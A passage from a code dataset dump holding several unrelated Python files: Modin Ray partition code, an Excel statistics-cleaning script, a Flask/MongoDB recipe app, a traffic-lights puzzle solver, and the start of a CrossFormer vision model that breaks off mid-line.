PandasOnRayFramePartition\n A new ``PandasOnRayFramePartition`` object.\n\n Notes\n -----\n It does not matter if `func` is callable or an ``ray.ObjectRef``. Ray will\n handle it correctly either way. The keyword arguments are sent as a dictionary.\n \"\"\"\n oid = self.oid\n call_queue = self.call_queue + [(func, args, kwargs)]\n if len(call_queue) > 1:\n result, length, width, ip = apply_list_of_funcs.remote(call_queue, oid)\n else:\n # We handle `len(call_queue) == 1` in a different way because\n # this dramatically improves performance.\n func, args, kwargs = call_queue[0]\n result, length, width, ip = apply_func.remote(oid, func, *args, **kwargs)\n return PandasOnRayFramePartition(result, length, width, ip)\n\n def add_to_apply_calls(self, func, *args, **kwargs):\n \"\"\"\n Add a function to the call queue.\n\n Parameters\n ----------\n func : callable or ray.ObjectRef\n Function to be added to the call queue.\n *args : iterable\n Additional positional arguments to be passed in `func`.\n **kwargs : dict\n Additional keyword arguments to be passed in `func`.\n\n Returns\n -------\n PandasOnRayFramePartition\n A new ``PandasOnRayFramePartition`` object.\n\n Notes\n -----\n It does not matter if `func` is callable or an ``ray.ObjectRef``. Ray will\n handle it correctly either way. The keyword arguments are sent as a dictionary.\n \"\"\"\n return PandasOnRayFramePartition(\n self.oid, call_queue=self.call_queue + [(func, args, kwargs)]\n )\n\n def drain_call_queue(self):\n \"\"\"Execute all operations stored in the call queue on the object wrapped by this partition.\"\"\"\n if len(self.call_queue) == 0:\n return\n oid = self.oid\n call_queue = self.call_queue\n if len(call_queue) > 1:\n (\n self.oid,\n self._length_cache,\n self._width_cache,\n self._ip_cache,\n ) = apply_list_of_funcs.remote(call_queue, oid)\n else:\n # We handle `len(call_queue) == 1` in a different way because\n # this dramatically improves performance.\n func, args, kwargs = call_queue[0]\n (\n self.oid,\n self._length_cache,\n self._width_cache,\n self._ip_cache,\n ) = apply_func.remote(oid, func, *args, **kwargs)\n self.call_queue = []\n\n def wait(self):\n \"\"\"Wait completing computations on the object wrapped by the partition.\"\"\"\n self.drain_call_queue()\n ray.wait([self.oid])\n\n def __copy__(self):\n \"\"\"\n Create a copy of this partition.\n\n Returns\n -------\n PandasOnRayFramePartition\n A copy of this partition.\n \"\"\"\n return PandasOnRayFramePartition(\n self.oid,\n length=self._length_cache,\n width=self._width_cache,\n ip=self._ip_cache,\n call_queue=self.call_queue,\n )\n\n def to_pandas(self):\n \"\"\"\n Convert the object wrapped by this partition to a ``pandas.DataFrame``.\n\n Returns\n -------\n pandas DataFrame.\n \"\"\"\n dataframe = self.get()\n assert type(dataframe) is pandas.DataFrame or type(dataframe) is pandas.Series\n return dataframe\n\n def to_numpy(self, **kwargs):\n \"\"\"\n Convert the object wrapped by this partition to a NumPy array.\n\n Parameters\n ----------\n **kwargs : dict\n Additional keyword arguments to be passed in ``to_numpy``.\n\n Returns\n -------\n np.ndarray\n \"\"\"\n return self.apply(lambda df, **kwargs: df.to_numpy(**kwargs)).get()\n\n def mask(self, row_indices, col_indices):\n \"\"\"\n Lazily create a mask that extracts the indices provided.\n\n Parameters\n ----------\n row_indices : list-like, slice or label\n The indices for the rows to extract.\n col_indices : list-like, slice or label\n The indices for the columns to extract.\n\n Returns\n -------\n PandasOnRayFramePartition\n A new ``PandasOnRayFramePartition`` object.\n \"\"\"\n new_obj = super().mask(row_indices, col_indices)\n if isinstance(row_indices, slice) and isinstance(\n self._length_cache, ObjectIDType\n ):\n new_obj._length_cache = compute_sliced_len.remote(\n row_indices, self._length_cache\n )\n if isinstance(col_indices, slice) and isinstance(\n self._width_cache, ObjectIDType\n ):\n new_obj._width_cache = compute_sliced_len.remote(\n col_indices, self._width_cache\n )\n return new_obj\n\n @classmethod\n def put(cls, obj):\n \"\"\"\n Put an object into Plasma store and wrap it with partition object.\n\n Parameters\n ----------\n obj : any\n An object to be put.\n\n Returns\n -------\n PandasOnRayFramePartition\n A new ``PandasOnRayFramePartition`` object.\n \"\"\"\n return PandasOnRayFramePartition(ray.put(obj), len(obj.index), len(obj.columns))\n\n @classmethod\n def preprocess_func(cls, func):\n \"\"\"\n Put a function into the Plasma store to use in ``apply``.\n\n Parameters\n ----------\n func : callable\n A function to preprocess.\n\n Returns\n -------\n ray.ObjectRef\n A reference to `func`.\n \"\"\"\n return ray.put(func)\n\n def length(self):\n \"\"\"\n Get the length of the object wrapped by this partition.\n\n Returns\n -------\n int\n The length of the object.\n \"\"\"\n if self._length_cache is None:\n if len(self.call_queue):\n self.drain_call_queue()\n else:\n self._length_cache, self._width_cache = get_index_and_columns.remote(\n self.oid\n )\n if isinstance(self._length_cache, ObjectIDType):\n self._length_cache = ray.get(self._length_cache)\n return self._length_cache\n\n def width(self):\n \"\"\"\n Get the width of the object wrapped by the partition.\n\n Returns\n -------\n int\n The width of the object.\n \"\"\"\n if self._width_cache is None:\n if len(self.call_queue):\n self.drain_call_queue()\n else:\n self._length_cache, self._width_cache = get_index_and_columns.remote(\n self.oid\n )\n if isinstance(self._width_cache, ObjectIDType):\n self._width_cache = ray.get(self._width_cache)\n return self._width_cache\n\n def ip(self):\n \"\"\"\n Get the node IP address of the object wrapped by this partition.\n\n Returns\n -------\n str\n IP address of the node that holds the data.\n \"\"\"\n if self._ip_cache is None:\n if len(self.call_queue):\n self.drain_call_queue()\n else:\n self._ip_cache = self.apply(lambda df: df)._ip_cache\n if isinstance(self._ip_cache, ObjectIDType):\n self._ip_cache = ray.get(self._ip_cache)\n return self._ip_cache\n\n @classmethod\n def _length_extraction_fn(cls):\n \"\"\"\n Return the function that computes the length of the object wrapped by this partition.\n\n Returns\n -------\n callable\n The function that computes the length of the object wrapped by this partition.\n \"\"\"\n return length_fn_pandas\n\n @classmethod\n def _width_extraction_fn(cls):\n \"\"\"\n Return the function that computes the width of the object wrapped by this partition.\n\n Returns\n -------\n callable\n The function that computes the width of the object wrapped by this partition.\n \"\"\"\n return width_fn_pandas\n\n @classmethod\n def empty(cls):\n \"\"\"\n Create a new partition that wraps an empty pandas DataFrame.\n\n Returns\n -------\n PandasOnRayFramePartition\n A new ``PandasOnRayFramePartition`` object.\n \"\"\"\n return cls.put(pandas.DataFrame())\n\n\n@ray.remote(num_returns=2)\ndef get_index_and_columns(df):\n \"\"\"\n Get the number of rows and columns of a pandas DataFrame.\n\n Parameters\n ----------\n df : pandas.DataFrame\n A pandas DataFrame which dimensions are needed.\n\n Returns\n -------\n int\n The number of rows.\n int\n The number of columns.\n \"\"\"\n return len(df.index), len(df.columns)\n\n\n@ray.remote(num_returns=4)\ndef apply_func(partition, func, *args, **kwargs): # pragma: no cover\n \"\"\"\n Execute a function on the partition in a worker process.\n\n Parameters\n ----------\n partition : pandas.DataFrame\n A pandas DataFrame the function needs to be executed on.\n func : callable\n Function that needs to be executed on the partition.\n *args : iterable\n Additional positional arguments to be passed in `func`.\n **kwargs : dict\n Additional keyword arguments to be passed in `func`.\n\n Returns\n -------\n pandas.DataFrame\n The resulting pandas DataFrame.\n int\n The number of rows of the resulting pandas DataFrame.\n int\n The number of columns of the resulting pandas DataFrame.\n str\n The node IP address of the worker process.\n \"\"\"\n try:\n result = func(partition, *args, **kwargs)\n # Sometimes Arrow forces us to make a copy of an object before we operate on it. We\n # don't want the error to propagate to the user, and we want to avoid copying unless\n # we absolutely have to.\n except ValueError:\n result = func(partition.copy(), *args, **kwargs)\n return (\n result,\n len(result) if hasattr(result, \"__len__\") else 0,\n len(result.columns) if hasattr(result, \"columns\") else 0,\n get_node_ip_address(),\n )\n\n\n@ray.remote(num_returns=4)\ndef apply_list_of_funcs(funcs, partition): # pragma: no cover\n \"\"\"\n Execute all operations stored in the call queue on the partition in a worker process.\n\n Parameters\n ----------\n funcs : list\n A call queue that needs to be executed on the partition.\n partition : pandas.DataFrame\n A pandas DataFrame the call queue needs to be executed on.\n\n Returns\n -------\n pandas.DataFrame\n The resulting pandas DataFrame.\n int\n The number of rows of the resulting pandas DataFrame.\n int\n The number of columns of the resulting pandas DataFrame.\n str\n The node IP address of the worker process.\n \"\"\"\n\n def deserialize(obj):\n if isinstance(obj, ObjectIDType):\n return ray.get(obj)\n elif isinstance(obj, (tuple, list)) and any(\n isinstance(o, ObjectIDType) for o in obj\n ):\n return ray.get(list(obj))\n elif isinstance(obj, dict) and any(\n isinstance(val, ObjectIDType) for val in obj.values()\n ):\n return dict(zip(obj.keys(), ray.get(list(obj.values()))))\n else:\n return obj\n\n for func, args, kwargs in funcs:\n func = deserialize(func)\n args = deserialize(args)\n kwargs = deserialize(kwargs)\n try:\n partition = func(partition, *args, **kwargs)\n # Sometimes Arrow forces us to make a copy of an object before we operate on it. We\n # don't want the error to propagate to the user, and we want to avoid copying unless\n # we absolutely have to.\n except ValueError:\n partition = func(partition.copy(), *args, **kwargs)\n\n return (\n partition,\n len(partition) if hasattr(partition, \"__len__\") else 0,\n len(partition.columns) if hasattr(partition, \"columns\") else 0,\n get_node_ip_address(),\n )\n","sub_path":"modin/engines/ray/pandas_on_ray/frame/partition.py","file_name":"partition.py","file_ext":"py","file_size_in_byte":15513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"571339496","text":"# -*- coding: utf-8 -*-\nimport func\nimport os\nimport datetime\nimport pandas as pd\nimport pickle\n\n\n# 已经标注的excel数据表路径\nExcelPath = r'D:\\Teacher Song\\spatil_time_label_test\\补充数据测试\\excel'\n# 补充后的地名库excel数据表\ncountyExcel = r'D:\\Teacher Song\\spatil_time_label_test\\补充数据测试\\地名库指标库\\地名库补充后.xls'\n# 输出路径\noutPath = r'D:\\Teacher Song\\spatil_time_label_test\\outExcel'\n\nyearList = list(map(str, range(2011, 2016))) # 有效年份\nattributesList = ['POPYE', 'FIX', 'RESID', 'VPOP', 'CPOP', 'GDP', 'GDP1', 'GDP2', 'GDP3'] # 有效字段名\ncountyDict = func.getCountyDict(countyExcel) # 获取地名字典\n\nstartTime = datetime.datetime.now()\n\n# 将地名字典保存在pickle文件中,在python2中关联shp数据时会用到。\npkl = open(outPath+'\\\\countyDict.pickle', 'wb')\npickle.dump(countyDict, pkl, protocol=2)\npkl.close()\n\n# pkl = open(outPath+'\\\\countyDict.pickle', 'rb')\n# countyDict = pickle.load(pkl)\n# pkl.close()\n\ncountyList = countyDict.keys()\nlog = outPath+\"\\\\log.txt\" # 新建一个txt文件收集出现错误的excel表\nfiles = open(log, \"w\")\n\nfileList = os.listdir(ExcelPath)\nStandarDataList = []\n\nfor f in fileList:\n if '.xls' in f[-4:]:\n fullPath = os.path.join(ExcelPath, f)\n print(fullPath)\n try:\n startPoint = func.getStartPoint(fullPath) # 获取keyword的行列及其值\n df = func.clearData(fullPath, startPoint) # 去掉多余的行列\n ExcelType = func.getExcelType(startPoint) # 获取excel表的类型\n dataList = func.getStandardData(df, ExcelType, startPoint) # 将数据逐条存入dataList\n # 将数据逐条规范化为[year, county, attributes, values],符合要求就存入StandarDataList中\n for data in dataList:\n # print(data)\n data = func.clearStandarData(data, countyDict, countyList, yearList, attributesList)\n # print(data)\n if data != []:\n StandarDataList.append(data)\n except:\n # 上述出错就将出错的excel名称保存在‘log.txt’中\n files.write(fullPath+'\\n')\n\n# data = open(outPath+'\\\\StandarDataList.pickle', 'wb')\n# pickle.dump(StandarDataList, data)\n# data.close()\n\n# data = open(outPath+'\\\\StandarDataList.pickle', 'rb')\n# StandarDataList = pickle.load(data)\n# data.close()\n\n# 将StandarDataList转化为DataFrame形式,并导出一份名为AStandarData的excel表\ndf = pd.DataFrame(StandarDataList, columns=['year', 'county', 'countyID', 'attributes', 'value'])\ndf.to_excel(outPath+'\\\\AStandarData.xls')\n\n# 根据年份,把数据分开,每一年的数据DataFrame通过DataFrame.pivot()方法转化为以county为列,attributes为行,values为值得透视表\n# 并每一年导出一个excel,\nfor y in yearList:\n dfyear = df[df.year == y]\n dfyear = dfyear.pivot(index='countyID', columns='attributes', values='value')\n print(dfyear)\n dfyear.to_excel(outPath+'\\\\excelBy{}.xls'.format(y))\n\nfiles.write(str(datetime.datetime.now()))\nfiles.close() # 在log.txt中写入日期,关闭log.txt文件。\n\nendTime = datetime.datetime.now()\nprint('use time: {} s'.format(str((endTime-startTime).seconds)))\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"420409914","text":"import os\nfrom flask import (\n Flask, flash, render_template, \n redirect, request, session, url_for)\nfrom flask_pymongo import PyMongo\nfrom bson.objectid import ObjectId\nif os.path.exists(\"env.py\"):\n import env\n\n\napp = Flask(__name__)\n\napp.config[\"MONGO_DBNAME\"] = os.environ.get(\"MONGO_DBNAME\")\napp.config[\"MONGO_URI\"] = os.environ.get(\"MONGO_URI\")\napp.secret_key = os.environ.get(\"SECRET_KEY\")\n\nmongo = PyMongo(app)\n\n\n@app.route(\"/\")\n@app.route(\"/get_recipes\")\ndef get_recipes():\n recipes = mongo.db.recipes.find()\n return render_template(\"recipes.html\", recipes=recipes)\n\n@app.route(\"/add_recipe\")\ndef add_recipe():\n category_list = mongo.db.categories.find()\n print(category_list)\n # import pdb ; pdb.set_trace()\n return render_template(\"add_recipe.html\", categories=category_list)\n\n@app.route(\"/insert_recipe\", methods=[\"POST\"])\ndef insert_recipe():\n recipes = mongo.db.recipes\n recipes.insert_one(request.form.to_dict())\n return redirect(url_for(\"get_recipes\"))\n\n@app.route(\"/edit_recipe/\")\ndef edit_recipe(recipe_id):\n the_recipe = mongo.db.recipes.find_one({\"_id\": ObjectId(recipe_id)})\n all_categories = mongo.db.categories.find()\n return render_template(\"editrecipe.html\", recipe=the_recipe, categories=all_categories)\n\n@app.route('/update_recipe/', methods=[\"POST\"])\ndef update_recipe(recipe_id):\n recipes = mongo.db.recipes\n recipes.update( {'_id': ObjectId(recipe_id)},\n { 'recipe_name':request.form.get('recipe_name'),\n 'recipe_category':request.form.get('recipe_category'),\n 'recipe_ingredients': request.form.get('recipe_ingredients'),\n 'recipe_directions': request.form.get('recipe_directions'),\n })\n return redirect(url_for(\"get_recipes\"))\n\n@app.route('/delete_recipe/')\ndef delete_recipe(recipe_id):\n\tmongo.db.recipes.remove({'_id': ObjectId(recipe_id)})\n\treturn redirect(url_for('get_recipes'))\n\n@app.route('/get_categories')\ndef get_categories():\n return render_template('categories.html',\n categories=mongo.db.categories.find())\n\n@app.route('/edit_category/')\ndef edit_category(category_id):\n return render_template('editcategory.html', \n category=mongo.db.categories.find_one({'_id': ObjectId(category_id)}))\n\n@app.route('/update_category/', methods=['GET', 'POST'] )\ndef update_category(category_id):\n mongo.db.categories.update(\n {'_id': ObjectId(category_id)},\n {'name': request.form.get('name')})\n return redirect(url_for('get_categories'))\n\n@app.route('/delete_category/')\ndef delete_category(category_id):\n\tmongo.db.categories.remove({'_id': ObjectId(category_id)})\n\treturn redirect(url_for('get_categories'))\n\n@app.route('/insert_category', methods=[\"POST\"])\ndef insert_category():\n categories = mongo.db.categories\n categories.insert_one(request.form.to_dict())\n return redirect(url_for(\"get_categories\"))\n\n@app.route('/add_category')\ndef add_category():\n return render_template('addcategory.html') \n\n\nif __name__ == \"__main__\":\n app.run(host=os.environ.get(\"IP\"),\n port=int(os.environ.get(\"PORT\", 5000)),\n debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"202581859","text":"#Author: Megan West\r\n#Title: Aneo Sponsored Puzzle: Traffic Lights\r\n#Goal of this puzzle: You enter a section of road and you plan to rely entirely\r\n#on your cruise control to cross through the area without having to stop or\r\n#slow down. The goal is to find the maximum speed (without speeding) that will\r\n#allow you to cross all the traffic lights while they are green.\r\n#Warning: You can't cross a traffic light the second it turns red!\r\n#Your vehicle enters the zone directly at the speed programmed on the cruise\r\n#control which ensures that it does not change.\r\n\r\n\r\nimport sys\r\nimport math\r\n\r\nSPEED_LIMIT_KPH = int(input())\r\nLIGHT_COUNT = int(input())\r\nSPEED_LIMIT_MPS = round(SPEED_LIMIT_KPH * (1000.0/3600.0), 0)\r\n\r\n\r\n#print(\"Speed limit in KPH: %d\" % SPEED_LIMIT_KPH)\r\n#print(\"Speed limit in meters per second = %f\" % SPEED_LIMIT_MPS)\r\n#print(\"Number of lights = %d\" % LIGHT_COUNT)\r\n\r\n#did not choose to add input validation loops to this code.\r\n\r\ndef get_light_stats():\r\n stats_list = []\r\n distance, duration = [int(j) for j in input().split()]\r\n stats_list.append(distance)\r\n #print(\"distance: %d\" % stats_list[0])\r\n stats_list.append(duration)\r\n #print(\"duration: %d\" % stats_list[1])\r\n return stats_list\r\n\r\ndef mps_to_kph(mps):\r\n kph = mps * (3600/1000.0)\r\n return kph\r\n\r\ndef kph_to_mps(kph):\r\n mps = kph * (1000.0/3600)\r\n return mps\r\n\r\ndef get_state(speed, distance, duration):\r\n #if speed > 50 and speed < 80: print(\"speed before conversion: %f\" % speed)\r\n mps = kph_to_mps(speed)\r\n #print(\"speed after conversion: %f\" % mps)\r\n period = duration * 2\r\n #print(\"period is %f\" % period)\r\n\r\n time_elapsed = distance / mps\r\n #print(round(time_elapsed, 2))\r\n\r\n while time_elapsed >= period:\r\n time_elapsed -= period\r\n\r\n if time_elapsed < (period / 2.0):\r\n return True\r\n else:\r\n return False\r\n\r\ndef calc_max_speed(speed, lights, light):\r\n if light >= LIGHT_COUNT: return speed\r\n if speed <= 0: return speed\r\n\r\n distance = lights[light][0]\r\n duration = lights[light][1]\r\n\r\n #print(speed, distance, duration)\r\n\r\n state = get_state(speed, distance, duration)\r\n\r\n #print(\"The state at light %d, speed %f, is %s\" % (light, speed, state))\r\n\r\n if state == True:\r\n return calc_max_speed(speed, lights, light + 1)\r\n\r\n return calc_max_speed(speed - 1.0, lights, light = 0)\r\n\r\ndef print_max_speed(speed):\r\n\r\n #initialize list of lights\r\n lights = []\r\n\r\n #populate the list of lists\r\n for light in range(LIGHT_COUNT):\r\n lights.append(get_light_stats())\r\n\r\n #start testing using speed_limit, so that we reach max speed faster.\r\n max_speed = round(calc_max_speed(speed, lights, 0), 0)\r\n print(int(max_speed))\r\n\r\nprint_max_speed(SPEED_LIMIT_KPH)\r\n","sub_path":"TrafficLights.py","file_name":"TrafficLights.py","file_ext":"py","file_size_in_byte":2785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"546431218","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n# @file : crossformer.py\n# @time : 2021/08/09 09:22:54\n# @authors : daoming zong, chunya liu\n# @version : 1.0\n# @contact : zongdaoming@sensetime.com; liuchunya@sensetime.com\n# @desc : None\n# Copyright (c) 2021 SenseTime IRDC Group. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport math\nimport copy\nimport torch\nimport torch.nn as nn\nfrom torch import Tensor\nimport torch.nn.functional as F\nfrom mmcv.cnn import ConvModule\nfrom typing import Optional, List\nfrom mmcv.runner import BaseModule\nfrom collections import OrderedDict\nimport torch.utils.checkpoint as checkpoint\nfrom utils.log_helper import default_logger as logger\nfrom timm.models.layers import DropPath, to_2tuple, trunc_normal_\n\nNEG_INF = -1000000\n\nclass Mlp(nn.Module):\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = act_layer()\n self.fc2 = nn.Linear(hidden_features, out_features)\n self.drop = nn.Dropout(drop)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop(x)\n x = self.fc2(x)\n x = self.drop(x)\n return x\n\nclass FPN(BaseModule):\n r\"\"\"Feature Pyramid Network.\n This is an implementation of paper `Feature Pyramid Networks for Object\n Detection `_.\n Args:\n in_channels (List[int]): Number of input channels per scale.\n out_channels (int): Number of output channels (used at each scale)\n num_outs (int): Number of output scales.\n start_level (int): Index of the start input backbone level used to\n build the feature pyramid. Default: 0.\n end_level (int): Index of the end input backbone level (exclusive) to\n build the feature pyramid. Default: -1, which means the last level.\n add_extra_convs (bool | str): If bool, it decides whether to add conv\n layers on top of the original feature maps. Default to False.\n If True, it is equivalent to `add_extra_convs='on_input'`.\n If str, it specifies the source feature map of the extra convs.\n Only the following options are allowed\n - 'on_input': Last feat map of neck inputs (i.e. backbone feature).\n - 'on_lateral': Last feature map after lateral convs.\n - 'on_output': The last output feature map after fpn convs.\n relu_before_extra_convs (bool): Whether to apply relu before the extra\n conv. Default: False.\n no_norm_on_lateral (bool): Whether to apply norm on lateral.\n Default: False.\n conv_cfg (dict): Config dict for convolution layer. Default: None.\n norm_cfg (dict): Config dict for normalization layer. Default: None.\n act_cfg (str): Config dict for activation layer in ConvModule.\n Default: None.\n upsample_cfg (dict): Config dict for interpolate layer.\n Default: `dict(mode='nearest')`\n init_cfg (dict or list[dict], optional): Initialization config dict.\n Example:\n >>> import torch\n >>> in_channels = [2, 3, 5, 7]\n >>> scales = [340, 170, 84, 43]\n >>> inputs = [torch.rand(1, c, s, s)\n ... for c, s in zip(in_channels, scales)]\n >>> self = FPN(in_channels, 11, len(in_channels)).eval()\n >>> outputs = self.forward(inputs)\n >>> for i in range(len(outputs)):\n ... print(f'outputs[{i}].shape = {outputs[i].shape}')\n outputs[0].shape = torch.Size([1, 11, 340, 340])\n outputs[1].shape = torch.Size([1, 11, 170, 170])\n outputs[2].shape = torch.Size([1, 11, 84, 84])\n outputs[3].shape = torch.Size([1, 11, 43, 43])\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n num_outs,\n start_level=0,\n end_level=-1,\n add_extra_convs=False,\n relu_before_extra_convs=False,\n no_norm_on_lateral=False,\n conv_cfg=None,\n norm_cfg=None,\n act_cfg=None,\n upsample_cfg=dict(mode='nearest'),\n init_cfg=dict(\n type='Xavier', layer='Conv2d', distribution='uniform')):\n super(FPN, self).__init__(init_cfg)\n assert isinstance(in_channels, list)\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.num_ins = len(in_channels)\n self.num_outs = num_outs\n self.relu_before_extra_convs = relu_before_extra_convs\n self.no_norm_on_lateral = no_norm_on_lateral\n self.fp16_enabled = False\n self.upsample_cfg = upsample_cfg.copy()\n\n if end_level == -1:\n self.backbone_end_level = self.num_ins\n assert num_outs >= self.num_ins - start_level\n else:\n # if end_level < inputs, no extra level is allowed\n self.backbone_end_level = end_level\n assert end_level <= len(in_channels)\n assert num_outs == end_level - start_level\n self.start_level = start_level\n self.end_level = end_level\n self.add_extra_convs = add_extra_convs\n assert isinstance(add_extra_convs, (str, bool))\n if isinstance(add_extra_convs, str):\n # Extra_convs_source choices: 'on_input', 'on_lateral', 'on_output'\n assert add_extra_convs in ('on_input', 'on_lateral', 'on_output')\n elif add_extra_convs: # True\n self.add_extra_convs = 'on_input'\n\n self.lateral_convs = nn.ModuleList()\n self.fpn_convs = nn.ModuleList()\n\n for i in range(self.start_level, self.backbone_end_level):\n l_conv = ConvModule(\n in_channels[i],\n out_channels,\n 1,\n conv_cfg=conv_cfg,\n norm_cfg=norm_cfg if not self.no_norm_on_lateral else None,\n act_cfg=act_cfg,\n inplace=False)\n fpn_conv = ConvModule(\n out_channels,\n out_channels,\n 3,\n padding=1,\n conv_cfg=conv_cfg,\n norm_cfg=norm_cfg,\n act_cfg=act_cfg,\n inplace=False)\n\n self.lateral_convs.append(l_conv)\n self.fpn_convs.append(fpn_conv)\n\n # add extra conv layers (e.g., RetinaNet)\n extra_levels = num_outs - self.backbone_end_level + self.start_level\n if self.add_extra_convs and extra_levels >= 1:\n for i in range(extra_levels):\n if i == 0 and self.add_extra_convs == 'on_input':\n in_channels = self.in_channels[self.backbone_end_level - 1]\n else:\n in_channels = out_channels\n extra_fpn_conv = ConvModule(\n in_channels,\n out_channels,\n 3,\n stride=2,\n padding=1,\n conv_cfg=conv_cfg,\n norm_cfg=norm_cfg,\n act_cfg=act_cfg,\n inplace=False)\n self.fpn_convs.append(extra_fpn_conv)\n\n def forward(self, inputs):\n \"\"\"Forward function.\"\"\"\n assert len(inputs) == len(self.in_channels)\n\n # build laterals\n laterals = [\n lateral_conv(inputs[i + self.start_level])\n for i, lateral_conv in enumerate(self.lateral_convs)\n ]\n\n # build top-down path\n used_backbone_levels = len(laterals)\n for i in range(used_backbone_levels - 1, 0, -1):\n # In some cases, fixing `scale factor` (e.g. 2) is preferred, but\n # it cannot co-exist with `size` in `F.interpolate`.\n if 'scale_factor' in self.upsample_cfg:\n laterals[i - 1] += F.interpolate(laterals[i],\n **self.upsample_cfg)\n else:\n prev_shape = laterals[i - 1].shape[2:]\n laterals[i - 1] += F.interpolate(\n laterals[i], size=prev_shape, **self.upsample_cfg)\n\n # build outputs\n # part 1: from original levels\n outs = [\n self.fpn_convs[i](laterals[i]) for i in range(used_backbone_levels)\n ]\n # part 2: add extra levels\n if self.num_outs > len(outs):\n # use max pool to get more levels on top of outputs\n # (e.g., Faster R-CNN, Mask R-CNN)\n if not self.add_extra_convs:\n for i in range(self.num_outs - used_backbone_levels):\n outs.append(F.max_pool2d(outs[-1], 1, stride=2))\n # add conv layers on top of original feature maps (RetinaNet)\n else:\n if self.add_extra_convs == 'on_input':\n extra_source = inputs[self.backbone_end_level - 1]\n elif self.add_extra_convs == 'on_lateral':\n extra_source = laterals[-1]\n elif self.add_extra_convs == 'on_output':\n extra_source = outs[-1]\n else:\n raise NotImplementedError\n outs.append(self.fpn_convs[used_backbone_levels](extra_source))\n for i in range(used_backbone_levels + 1, self.num_outs):\n if self.relu_before_extra_convs:\n outs.append(self.fpn_convs[i](F.relu(outs[-1])))\n else:\n outs.append(self.fpn_convs[i](outs[-1]))\n return tuple(outs)\n\n\nclass DynamicPosBias(nn.Module):\n def __init__(self, dim, num_heads, residual):\n super().__init__()\n self.residual = residual\n self.num_heads = num_heads\n self.pos_dim = dim // 4\n self.pos_proj = nn.Linear(2, self.pos_dim)\n self.pos1 = nn.Sequential(\n nn.LayerNorm(self.pos_dim),\n nn.ReLU(inplace=True),\n nn.Linear(self.pos_dim, self.pos_dim),\n )\n self.pos2 = nn.Sequential(\n nn.LayerNorm(self.pos_dim),\n nn.ReLU(inplace=True),\n nn.Linear(self.pos_dim, self.pos_dim)\n )\n self.pos3 = nn.Sequential(\n nn.LayerNorm(self.pos_dim),\n nn.ReLU(inplace=True),\n nn.Linear(self.pos_dim, self.num_heads)\n )\n def forward(self, biases):\n if self.residual:\n pos = self.pos_proj(biases) # 2Gh-1 * 2Gw-1, heads\n pos = pos + self.pos1(pos)\n pos = pos + self.pos2(pos)\n pos = self.pos3(pos)\n else:\n pos = self.pos3(self.pos2(self.pos1(self.pos_proj(biases))))\n return pos\n\n def flops(self, N):\n flops = N * 2 * self.pos_dim\n flops += N * self.pos_dim * self.pos_dim\n flops += N * self.pos_dim * self.pos_dim\n flops += N * self.pos_dim * self.num_heads\n return flops\n\nclass Attention(nn.Module):\n r\"\"\" Multi-head self attention module with relative position bias.\n Args:\n dim (int): Number of input channels.\n num_heads (int): Number of attention heads.\n qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True\n qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set\n attn_drop (float, optional): Dropout ratio of attention weight. Default: 0.0\n proj_drop (float, optional): Dropout ratio of output. Default: 0.0\n \"\"\"\n\n def __init__(self, dim, num_heads, qkv_bias=True, qk_scale=None, attn_drop=0., proj_drop=0.,\n position_bias=True):\n\n super().__init__()\n self.dim = dim\n self.num_heads = num_heads\n head_dim = dim // num_heads\n self.scale = qk_scale or head_dim ** -0.5\n self.position_bias = position_bias\n if self.position_bias:\n self.pos = DynamicPosBias(self.dim // 4, self.num_heads, residual=False)\n\n self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop)\n\n self.softmax = nn.Softmax(dim=-1)\n\n def forward(self, x, H, W, mask=None):\n \"\"\"\n Args:\n x: input features with shape of (num_windows*B, N, C)\n mask: (0/-inf) mask with shape of (num_windows, Gh*Gw, Gh*Gw) or None\n \"\"\"\n group_size = (H, W)\n B_, N, C = x.shape\n assert H*W == N\n qkv = self.qkv(x).reshape(B_, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4).contiguous()\n q, k, v = qkv[0], qkv[1], qkv[2] # make torchscript happy (cannot use tensor as tuple)\n\n q = q * self.scale\n attn = (q @ k.transpose(-2, -1)) # (num_windows*B, N, N), N = Gh*Gw\n\n if self.position_bias:\n # generate mother-set\n position_bias_h = torch.arange(1 - group_size[0], group_size[0], device=attn.device)\n position_bias_w = torch.arange(1 - group_size[1], group_size[1], device=attn.device)\n biases = torch.stack(torch.meshgrid([position_bias_h, position_bias_w])) # 2, 2Gh-1, 2W2-1\n biases = biases.flatten(1).transpose(0, 1).contiguous().float()\n\n # get pair-wise relative position index for each token inside the window\n coords_h = torch.arange(group_size[0], device=attn.device)\n coords_w = torch.arange(group_size[1], device=attn.device)\n coords = torch.stack(torch.meshgrid([coords_h, coords_w])) # 2, Gh, Gw\n coords_flatten = torch.flatten(coords, 1) # 2, Gh*Gw\n relative_coords = coords_flatten[:, :, None] - coords_flatten[:, None, :] # 2, Gh*Gw, 